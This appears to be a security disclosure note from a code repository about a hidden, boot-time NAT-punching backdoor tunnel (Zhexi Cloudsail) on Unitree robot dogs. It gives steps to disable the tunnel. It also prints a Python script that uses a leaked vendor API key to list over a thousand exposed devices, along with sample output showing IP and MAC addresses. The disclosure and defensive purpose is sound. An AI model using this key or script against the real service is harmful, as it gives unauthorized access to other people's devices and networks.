-
Notifications
You must be signed in to change notification settings - Fork 72
/
ZhexiBackdoorNATPuncher
48 lines (33 loc) · 3.14 KB
/
ZhexiBackdoorNATPuncher
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
# Cloudsail backdoor
Cloudsail: Zhexi Cloud Interconection Nat Punching network backdoor tunnel.
https://www.zhexi.tech/help/api/xd/
P2P tunnel can be created between any clientIDs (read as dogs), and a unitree master client (read as any other individual with the leaked key).
https://www.zhexi.tech/help/api/xd/p2p-tunnel.html
The cloudsail client launches at boot on the RasPi
pi@raspberrypi:~ $ ps -ax | grep zhe
425 ? Ssl 0:00 /usr/local/zhexi/cloudsail/csclient start --mode=daemon
507 ? Sl 0:03 /usr/local/zhexi/cloudsail/csclient start --mode=worker
You can disbale the tunnel by killing the cloudsail daemon
root@raspberrypi:/home/pi/Unitree/autostart# systemctl disable CSClientDaemon
Removed /etc/systemd/system/multi-user.target.wants/CSClientDaemon.service.
You can also move the auto start "tunnel" out of the way so it is unable to autostart
root@raspberrypi:/home/pi/Unitree/autostart# mv tunnel/ /root/tunnel_disabled/
Making requests via their leaked API key showed initially 600 dogs, months later double that amount.
#!/usr/bin/python3
import requests
res = requests.get("https://cloud.zhexi.tech/api/v2/machine/list", params={ "apikey": "206a70fb105798954096c6603fff2af1", "remark": "", }, verify=False)
print(res.json())
June 2022
{'error': 0, 'data': [{'id': '7b8152d4-ed15-11ec-ba2f-02420a0001c7', 'name': 'raspberrypi', 'remark': '', 'os': 'Debian GNU/Linux 10 (buster)', 'ip': '10.130.134.147', 'publicIP': '39.144.1.73', 'mac': 'e4:5f:01:85:84:22', 'version': '1.143.0.15537', 'activetime': '2022-06-16T01:55:11.000Z', 'addtime': '2022-06-16T01:41:46.000Z', 'isActive': 1}], 'total': 614, 'current': 1}
January 2023
{'error': 0, 'data': [{'id': '9b658552-90c5-11ed-8010-02420a0001ca', 'name': 'raspberrypi', 'remark': '', 'os': 'Debian GNU/Linux 10 (buster)', 'ip': '10.90.21.11', 'publicIP': '223.104.246.203', 'mac': 'e4:5f:01:b6:e1:e8', 'version': '1.143.0.15537', 'activetime': '2023-01-10T10:45:00.000Z', 'addtime': '2023-01-10T10:38:37.000Z', 'isActive': 0}], 'total': 1133, 'current': 1}
This tunnel exposes the network connected to the dog to outside influence via the tunel. Someone can control the dog via MQTT, or attack networks connected to the dog, or use the dog to attack Wifi networks within the dogs reach.
# Concept
Decentralized Remote Interconnection 2.0
https://www.zhexi.tech/blog/20200822/
"Traditional VPN must technically have a "fixed address server" role, which is the "center", and all nodes must first connect to this center to communicate with each other. For remote interconnection, this center is a burden. Without this center, the direct connection between nodes will be simpler and more efficient, and single-point failure can be avoided. Unlike "Everyone is the center", the real sense of decentralization is to eliminate any form of VPN server, whether it is In-cloud or On-premises. This is the latest version of Cassie."
Zhexi Cloud Internet API Technology White Paper
https://www.zhexi.tech/blog/20211008
